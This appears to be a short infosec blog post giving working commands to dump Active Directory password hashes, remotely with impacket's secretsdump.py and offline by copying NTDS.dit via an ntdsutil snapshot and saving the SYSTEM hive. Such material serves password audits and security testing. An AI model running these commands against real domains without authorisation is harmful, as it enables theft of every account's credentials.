Dumping Active Directory Password Hashes

Remotely, with impacket's secretsdump.py. This asks the domain controller for the hashes over the directory replication protocol (DRSUAPI, the same mechanism as DCSync), so the account you authenticate with needs replication rights on the domain (the "Replicating Directory Changes" / "Replicating Directory Changes All" rights, which Domain Admins have by default):

pip install pyasn1
pip install impacket
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>

You will be prompted for the user's password (or pass -hashes LMHASH:NTHASH to authenticate with a hash instead). -just-dc-ntlm limits the output to the NTLM hashes from NTDS.dit; without it secretsdump.py also pulls Kerberos keys and, where it can, the SAM and LSA secrets.

Alternative Approach

  • Run cmd.exe as Administrator on the domain controller.
  • Run ntdsutil and type the following commands:
snapshot
activate instance NTDS
create
  • This creates a snapshot and prints the GUID of the newly created snapshot set. ntdsutil uses the Volume Shadow Copy Service to take the snapshot, but unlike a raw shadow copy it also makes sure the database inside it is in a consistent state. The snapshot is needed in the first place because the live NTDS.dit is held open by the directory service and cannot simply be copied while the DC is running. Use the GUID in the following command:
mount <UUID>
  • The output shows the path where the snapshot was mounted (something like C:\$SNAP_<timestamp>_VOLUMEC$\). Start another cmd.exe as Administrator and copy NTDS.dit from that mount point (Windows\NTDS\NTDS.dit under the mount path, for a default install).
  • Create a copy of the SYSTEM registry hive:
reg.exe save HKLM\SYSTEM <path_where_you_want_to_save_it>
  • Go back to the cmd.exe window with ntdsutil running, unmount the snapshot (and, unless you want to keep it, delete it so that a mounted copy of the directory database does not linger on the DC) and exit:
unmount <UUID>
delete <UUID>
quit
quit
  • With the two saved files (NTDS.dit and the SYSTEM registry hive) you can run the same secretsdump.py script offline on any machine; this step does not need to be done on the domain controller. The SYSTEM hive is required because it holds the boot key that decrypts the Password Encryption Key (PEK) stored inside NTDS.dit; without it the hashes in the database cannot be decrypted:
secretsdump.py -system <path_to_system_hive> -ntds <path_to_ntds.dit> LOCAL

Airman

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.